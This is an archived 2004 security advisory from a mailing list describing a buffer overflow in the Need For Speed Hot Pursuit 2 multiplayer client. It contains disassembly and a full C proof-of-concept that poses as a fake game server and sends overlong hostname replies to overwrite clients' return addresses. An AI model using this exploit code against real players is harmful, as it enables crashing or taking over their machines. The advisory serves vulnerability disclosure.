[NEWS] Need For Speed Hot Pursuit II Multiplayer Client Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 01/26/04

Next message: SecuriTeam: "[TOOL] RECUB (Remote Encrypted Callback Unix Backdoor) Windows Port"

Previous message: SecuriTeam: "[UNIX] Hijacking Apache HTTP/HTTPS Services Using Mod_perl File Descriptor Leakage"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 26 Jan 2004 12:11:42 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Need For Speed Hot Pursuit II Multiplayer Client Buffer Overflow
------------------------------------------------------------------------

SUMMARY

Need For Speed Hot Pursuit 2 is a racing game developed by
<http://www.blackboxgaming.com> BlackboxGames and published by
<http://www.ea.com> Electronic Arts.

The NFSHP2 client is vulnerable to a buffer overflow caused by a long
string in the information replied by servers when entering multiplayer
mode.

DETAILS

Vulnerable Systems:
* Need For Speed Hot Pursuit 2 version 2.42 or prior

The information queries are made automatically by every client that enters
the multiplayer screen of the game. Each request packet will be sent to
each and every server listed in the game's server list. The client then
awaits the replies.

There is a problem in the way the client handles the servers' replies,
more specifically in handling the values that come after the following
parameters: gamename, gamever, hostname, gametype, mapname and gamemode.

Shown here is a small snippet of code that permits a buffer overflow:

:0050558D 6814206E00 push 006E2014
:00505592 6800E86900 push 0069E800 ("mapname")
:00505597 56 push esi
:00505598 E873930000 call 0050E910 ; SEARCH FOR "mapname"
:0050559D 83C40C add esp, 0000000C
:005055A0 8D9344010000 lea edx, dword[ebx+00000144]
:005055A6 8A08 mov cl, byte[eax]
:005055A8 40 inc eax
:005055A9 880A mov byte[edx], cl
:005055AB 42 inc edx
:005055AC 84C9 test cl, cl
:005055AE 75F6 jne 005055A6

Basically what the code does is look for the string mapname in the packet
buffer and copy it to an apparently smaller buffer. As stated before, all
clients perform these information queries so in effect, if there is even
one fake server that is exploiting this vulnerability it could potentially
allow for an attacker to execute arbitrary code that can take over all
clients or just prohibit anyone from playing.

A proof of concept code is shown below:

by Luigi Auriemma

UNIX & WIN VERSION
*/

#include < stdio.h>
#include < stdlib.h>
#include < string.h>

#ifdef WIN32
#include < winsock.h>
#include "winerr.h"

    #define close closesocket
#else
    #include < unistd.h>
    #include < sys/socket.h>
    #include < sys/types.h>
    #include < arpa/inet.h>
    #include < netdb.h>
#endif

#define VER "0.1"
#define BUFFSZ 2048
#define PORT 61220
#define RETADD 0xdeadc0de
#define RETOFF 540
#define NFS240 "18022640"
#define NFS242 "18088178"
#define NFSOFF 669 /* referred to pck[] nver, don't change it */

void std_err(void);

int main(int argc, char *argv[]) {
    int sd,
                err,
                on = 1,
                psz;
    struct sockaddr_in peer;
    u_char *buff,
                pck[] =
                "\\gamename\\nfs6"
                "\\gamever\\240" // it is useless
                "\\hostname\\"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
                "aaaaaaaaaaaaaaaaaaaaaaaa"
                "0000" // return address
                "\\hostport\\8511"
                "\\mapname\\Fall Winds"
                "\\gametype\\Single Race"
                "\\numplayers\\1"
                "\\maxplayers\\8"
                "\\gamemode\\openplaying"
                "\\pbmd\\0"
                "\\password\\0"
                "\\nver\\" NFS240
                "\\ctid\\6"
                "\\res\\38"
                "\\dir\\0"
                "\\laps\\2"
                "\\ded\\0"
                "\\final\\"
                "\\queryid\\2.1";

setbuf(stdout, NULL);

    fputs("\n"
        "Need for Speed Hot pursuit 2 < = 242 client's buffer overflow
"VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web: http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\nUsage: %s < version>\n"
            "\n"
            "Version:\n"
            "240 = this is the default (1.0) and more diffused version\n"
            "242 = the latest patched version, rarely used by players\n"
            "\n", argv[0]);
        exit(1);
    }

    if(!memcmp(argv[1], "240", 3)) {
        printf("Selected version 240 (nver %s)\n", NFS240);
    } else if(!memcmp(argv[1], "242", 3)) {
        printf("Selected version 242 (nver %s)\n", NFS242);
        memcpy(pck + NFSOFF, NFS242, sizeof(NFS242) - 1);
    } else {
        printf("\nError: you must choose between 240 and 242 only\n");
        exit(1);
    }

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

    peer.sin_addr.s_addr = INADDR_ANY;
    peer.sin_port = htons(PORT);
    peer.sin_family = AF_INET;
    psz = sizeof(peer);

printf("\nBinding UDP port %u\n", PORT);

    err = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on,
sizeof(on));
    if(err < 0) std_err();
    err = bind(sd, (struct sockaddr *)&peer, psz);
    if(err < 0) std_err();

printf("The return address will be overwritten with 0x%08x\n",
RETADD);
*(u_long *)(pck + RETOFF) = RETADD;

buff = malloc(BUFFSZ);
if(!buff) std_err();

    fputs("Clients:\n", stdout);
    while(1) {
        err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer,
&psz);
        if(err < 0) std_err();

printf("%16s:%hu -> ",
inet_ntoa(peer.sin_addr), htons(peer.sin_port));

        err = sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr
*)&peer, psz);
        if(err < 0) std_err();
        fputs("BOOM\n", stdout);
    }

close(sd);
return(0);
}

#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

Patch Availability:
There is no fix available. There has been no reply from either Electronic
Arts or BlackboxGaming.

ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@altervista.org> Luigi
Auriemma

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[TOOL] RECUB (Remote Encrypted Callback Unix Backdoor) Windows Port"

Previous message: SecuriTeam: "[UNIX] Hijacking Apache HTTP/HTTPS Services Using Mod_perl File Descriptor Leakage"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[NEWS] Sauerbraten Engine Multiple Vulnerabilities (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The problem, which affects both
server and clients, is that this code ... C] Clients Crash Through Invalid Map ...
When a client ... (Securiteam)
[NEWS] Cube Engine Multiple Vulnerabilities (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The problem, which affects both
server and clients, is that this code ... C] Clients Crash through Invalid Map ...
client tries to load an invalid map file it will exit immediately showing ... (Securiteam)
[UNIX] Multiple up-imapproxy DoS Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... connections open after client
has logged out, ... allows attacker to cause the server to crash by sending them when they
... extern void HandleRequest(int); ... (Securiteam)
[NEWS] Soldier Of Fortune II Format String (Through PunkBuster)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... PB for server version 1.180
and prior ... players who use invalid cvars, for example with values outside the range
... The message sent to the client contains both the name of the monitored ... (Securiteam)
[NT] Horde Multiple XSS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... based on PHP and the Horde
Framework." ... Horde is subject to a client side script injection vulnerability
in the ... (Securiteam)